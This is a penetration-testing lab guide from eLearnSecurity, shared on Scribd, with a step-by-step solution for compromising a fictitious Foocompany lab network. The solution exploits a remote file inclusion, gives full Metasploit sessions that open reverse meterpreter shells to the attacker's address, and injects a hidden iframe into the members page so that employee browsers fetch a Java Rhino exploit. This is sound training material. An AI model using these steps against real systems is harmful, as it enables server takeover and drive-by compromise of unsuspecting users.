Scribd
Upload
13 views18 pages

Lab 06.0 - Blind Penetration Test

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views18 pages

Lab 06.0 - Blind Penetration Test

Uploaded by

es169371
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 18

HERA

LAB ID: 6

BLIND PENETRATION TEST


[Blind Penetration Test] LAB ID: 6

1. LAB
You are a Penetration tester and you’re asked to perform a Penetration
test against Foocompany. The organization relies upon Foohosting inc. to
host a dedicated web server on which different organization’s websites
are present. Your goal is to obtain access to the internal target
organization network, meaning you have to exploit one or more internal
machines. You know that the organization website offers a members
area, that is daily browsed by the employees of the organization to
perform different tasks.

This is what client organization defined as scope of tests:

 WEB SERVER IP ADDRESS: 10.100.0.100


 ANY CORPORATE PRIVATE ADDRESS IN THE RANGE: 192.168.78.0/24

The following image summarizes the Lab environment

eLearnSecurity s.r.l. © 2012 | H E R A 2


[Blind Penetration Test] LAB ID: 6

2. GOALS
 Obtain access to one or more machines of the organization network

3. WHAT YOU WILL LEARN


 You will know at the end

4. RECOMMENDED TOOLS
 Metasploit

5. IMPORTANT NOTE BEFORE STARTING


In this lab there are no tasks to follow. You are completely free to
move in the lab environment, choose your next steps, use your own
exploit and skills and your preferred tools. Moreover, in this lab you
also have to use web application knowledge and exploitation.

eLearnSecurity s.r.l. © 2012 | H E R A 3


[Blind Penetration Test] LAB ID: 6

Further information:

 Labs machines (like web server and internal organization


machines) are not connected to the internet.

 In order to connect to the target organization website you have


to insert the following two static rules in your hosts file:

o 10.100.0.100 foocompany.com

o 10.100.0.100 members.foocompany.com

------------------------------------------ hosts path ---------------------------------------


- Windows: C:\Windows\System32\drivers\etc\hosts
- Linux: /etc/hosts

--------------------------------------------------------------------------------------------------

Following there is the lab solutions. Be sure to read them only when
you have finished your lab, or if you are stuck.

eLearnSecurity s.r.l. © 2012 | H E R A 4


[Blind Penetration Test] LAB ID: 6

Solutions

eLearnSecurity s.r.l. © 2012 | H E R A 5


[Blind Penetration Test] LAB ID: 6

Task 1. Web server

Since our only connection to the target machines (target internal


network) is the web server, this could be a good point to start with.

The following is a screenshot of our /etc/hosts file, with the two entries
that will allow us to connect to the organization website:

By adding the previous two lines, we are now able to browse the
organization website:

eLearnSecurity s.r.l. © 2012 | H E R A 6


[Blind Penetration Test] LAB ID: 6

Browsing the website we can see that in the members area


(members.foocompany.com) there could be a possible vulnerability to
exploit. Indeed if we look at the address, we can see that the value of the
parameter ‘pag’ is a file:

Indeed if we try to open the following address, we are able to read the
announcement.txt file:

What we can do now is to check what happens if we insert an URL instead


of a file. To check if this works, we can simply insert the organization
website URL as value:

eLearnSecurity s.r.l. © 2012 | H E R A 7


[Blind Penetration Test] LAB ID: 6

As you can see the page (foocompany.com) has been included. This
means that the server is vulnerable to RFI (Remote File Inclusion).

With this information, we should be able to exploit the server. We can do


so in different ways: With Metasploit and with php shells.

eLearnSecurity s.r.l. © 2012 | H E R A 8


[Blind Penetration Test] LAB ID: 6

1) METASPLOIT
Metasploit offers a specific module that allows you to exploit RFI, called
‘php_include’. We need to set the server address, the URL vulnerable to
RFI and the payload to use.

//Select the module to use


msf > use exploit/unix/webapp/php_include
//set the remote host, meaning the target server
msf exploit(php_include) > set RHOST 10.100.0.100
RHOST => 10.100.0.100
//The URI to request, with the include parameter changed to XXpathXX
msf exploit(php_include) > set PHPURI /index.php?pag=XXpathXX
PHPURI => /index.php?pag=XXpathXX
//The local host to listen on
msf exploit(php_include) > set SRVHOST 172.16.5.34
SRVHOST => 172.168.5.33
//The payload to use
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
//The local host (our ip address)
msf exploit(php_include) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
msf exploit(php_include) > exploit

[*] Started reverse handler on 172.16.5.34:4444


[*] Using URL: http://172.16.5.34/Tb44IeIC5pyIvC
[*] PHP include server started.
[*] Sending stage (38791 bytes) to 10.100.0.100
[*] Meterpreter session 1 opened (172.16.5.34:4444 -> 10.100.0.100:49241)
at 2012-04-11 17:53:20 +0200

meterpreter >

Metasploit will start a local server hosting a shell on /Tb44IeIC5pyIvC.

Then the module connects to the vulnerable website triggering the


vulnerability. This shell will start a Meterpreter reverse TCP session.

eLearnSecurity s.r.l. © 2012 | H E R A 9


[Blind Penetration Test] LAB ID: 6

2) SHELL
An easier way to exploit the server is by using shells.
Note: Lab machines are not connected to internet. We have to provide the shell.

We can create our shell and then store it in the folder ‘/var/www’. Now
we have to start the apache service. We can do it by clicking apache start
in Application->Backtrack->Services->HTTPD:

Shell

Start apache service

eLearnSecurity s.r.l. © 2012 | H E R A 10


[Blind Penetration Test] LAB ID: 6

Now we have to change the value in the URI in order to let the server
include and load our shell (http://OUR_IP_ADDRESS/shell.txt):

Task 2. Info gathering

Now that we took control of the server we can start searching for useful
information that can help us reach our goal. Since this is the only
connection between us and the organization network (members area is
browsed by organization employees) , we have to think about how we
can use the server to gain access to the organization machines.

By searching the web server folders, we can find a file named ‘logs.txt’
that could reveal useful information. Indeed opening it, we can see an
history of clients that have connected to the members area, and some
other information.

eLearnSecurity s.r.l. © 2012 | H E R A 11


[Blind Penetration Test] LAB ID: 6

In the logs.txt file there are different warning that tells us about clients
logins attempts, their browser agent and Java version. As you can see
there are at least two clients (192.168.78.25 and 192.168.78.5) with an
out-of-date Java installed.

By searching Java vulnerabilities, we can see that the two Java versions
are both vulnerable to Java Rhino exploit.

Once again, we know that organization employees, usually log into the
members area. What we can do then, is edit the members webpage, in
order to insert one or more iframes, that will point to our attacker
machine and try to exploit clients vulnerabilities this way.

eLearnSecurity s.r.l. © 2012 | H E R A 12


[Blind Penetration Test] LAB ID: 6

Task 3. Client exploitation

There are different metasploit modules that we can use to achieve this
goal.

In this case we will use both

 “auxiliary/server/browser_autopwn” and

 “exploit/multi/browser/java_rhino”

The first one will use different browser exploits, while the second is more
specific for our environment, since the clients found in the ‘logs.txt’ file
are both vulnerable to this exploit. The reason why we also use the first
one, is that we don’t know if there are other workstations vulnerable to
different exploits. We want to maximize our chances of entering the
corporate network through a client side exploit.

Let’s see first how to configure the modules.

eLearnSecurity s.r.l. © 2012 | H E R A 13


[Blind Penetration Test] LAB ID: 6

1) BROWSER_AUTOPWN

//Select the module to use


msf > use auxiliary/server/browser_autopwn
//The local host (our ip address)
msf exploit(browser_autopwn) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
//The local host to listen on
msf exploit(browser_autopwn) > set SRVHOST 172.16.5.34
SRVHOST => 172.168.5.33
msf exploit(browser_autopwn) > exploit

[*] Setup
[*] Obfuscating initial javascript 2012-04-12 11:04:48 +0200
msf auxiliary(browser_autopwn) > [*] Done in 0.698111897 seconds

[*] Starting exploit modules on host 172.168.5.34...


[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
[*] Using URL: http://172.16.5.34:8080/JAHJDnByXPQRX



[*] Starting the payload handler...
[*] Starting the payload handler...

[*] --- Done, found 24 exploit modules

[*] Using URL: http://172.16.5.34:8080/GVOsZD92MVyXx21


[*] Server started.

This way we have a URL to insert in the webserver

eLearnSecurity s.r.l. © 2012 | H E R A 14


[Blind Penetration Test] LAB ID: 6

2) JAVA_RHINO
In the same way as browser_autopown we have to set the java_rhino
module. Note that there are 2 different machines vulnerable to this
exploit, and they have different OS’s. So we have to set the module
properly (indeed we will leave the TARGET option to 0 - Generic).

//Select the module to use


msf > use exploit/multi/browser/java_rhino
//The local host to listen on
msf exploit(java_rhino) > set SRVHOST 172.16.5.34
SRVHOST => 172.168.5.33
//The local port to listen on
msf exploit(java_rhino) > set SRVPORT 8081
SRVPORT => 8081
//set the PAYLOAD to use (java is used for generic machines)
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
//The local host (our ip address)
msf exploit(java_rhino) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
msf exploit(java_rhino) > exploit

[*] Started reverse handler on 172.16.5.34:4567


[*] Using URL: http://172.16.5.34:8081/fdos8h49dzUt851
[*] Server started.

Now we have another URL that we can use to exploit the target
organization corporate network.

What we have to do now, is to inject a hidden iframe in the members


area home page that will load our malicious page each time someone
visits the page.

eLearnSecurity s.r.l. © 2012 | H E R A 15


[Blind Penetration Test] LAB ID: 6

To do it, we will use the our shell or our metasploit session (download,
edit and then upload the file back).

In this case we will use only the java_rhino exploit, so we add the
following code to the index.php:

-------------------------------------iframe in index.php-----------------------------------

<iframe src=http://172.16.5.34:8081/fdos8h49dzUt851 width=1


height=1 style=”visibility:hidden; position:absolute”></iframe>

Where http://172.16.5.34:8081/fdos8h49dzUt851 is the URL created


with metasploit.

eLearnSecurity s.r.l. © 2012 | H E R A 16


[Blind Penetration Test] LAB ID: 6

This way, every time someone opens the URL members.foocompany.com,


it will automatically request our exploit URL. If the browser or any of the
installed plugins is vulnerable, we will obtain a meterpreter session.

Once the page has been saved, we just have to wait for one of the
vulnerable clients to visit the members page. Indeed after few minutes
the first session has been created (IP: 192.168.78.5):

msf exploit(java_rhino) >


[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49874...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49877...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49878...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49879...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49880...
[*] Sending stage (28541 bytes) to 192.168.78.5
[*] Meterpreter session 2 opened (172.16.5.34:4567 -> 192.168.78.5:49881)
at 2012-04-12 12:56:27 +0200

eLearnSecurity s.r.l. © 2012 | H E R A 17


[Blind Penetration Test] LAB ID: 6

And right after the previous machine, another one has been exploited
(IP: 192.168.78.25)

msf exploit(java_rhino) >


[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44055...
[*] Sending Applet.jar to 192.168.78.25:44056...
[*] Sending Applet.jar to 192.168.78.25:44056...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44057...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44058...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44059...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44060...
[*] Sending stage (28541 bytes) to 192.168.78.25
[*] Meterpreter session 3 opened (172.16.5.34:4567 ->
192.168.78.25:58011) at 2012-04-12 12:56:53 +0200

From here exploitation of the company can begin.

eLearnSecurity s.r.l. © 2012 | H E R A 18

You might also like